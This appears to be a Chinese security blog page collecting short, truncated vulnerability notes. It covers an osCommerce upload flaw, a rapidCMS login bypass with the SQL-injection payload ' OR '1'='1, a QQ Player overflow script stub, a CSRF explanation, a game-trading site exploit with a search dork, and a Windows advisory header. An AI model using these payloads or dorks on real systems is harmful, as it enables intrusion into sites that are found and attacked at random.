凌风[0x0F]'s BloG

这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。

EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤，可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce

rapidCMS V2 后台登录认证未经过严格过滤，导致万能密码绕过漏洞。

利用方法：

User:xxoo
Pass: ' OR '1'='1

Demo : http://site/admin.php

QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。用户受骗使用QQ影音打开了特制的ASX或CUE文件就可以触发栈溢出，导致执行任意代码。

测试代码：

#!/usr/bin/env python#################################################################...

跨站请求伪造(cross-site request forgery)通常缩写为CSRF/XSRF，直译为跨站请求伪造，即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求，当然并不需要向用户端伪装任何具有欺骗的内容，在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包，利用的实质是劫持用户的会话状态，强行提交攻击者构造的具有“操作行为”的数据包。可以看出，最关键的是劫持用户的会话状态，所以说，导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识，即是说在使用HTTPCookie传送会话令牌的过程中，应该更谨慎的判断当前用户，而不是简单的通过操作数据包的 Cookie值来鉴别，简单的说是每次数据交互时，对提交的数据包实行唯一性标识。与XSS攻击相比，XSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。
...

华速网游交易平台oday程序：华速网游交易平台
漏洞说明:上传，暴库
google关键字: inurl:list_buy.asp?class_1

EXP测试：
（复制代码保存为html文件）

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
...

意间发现个 PHP168 V6.02的 BUG

跟之前那个 job 下载任意文件性质差不多

只不过这次是把任意文件再拷贝为一份jpg出来！附加一个爆路

...

发布日期： 2010-07-15
更新日期： 2010-07-16

受影响系统：

Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2003 SP2
...

http://bbs.yhsafe.com/reg.php?invitecode=072aa71cd8ykvP80
http://bbs.yhsafe.com/reg.php?invitecode=b46e1736e9l12W1G
...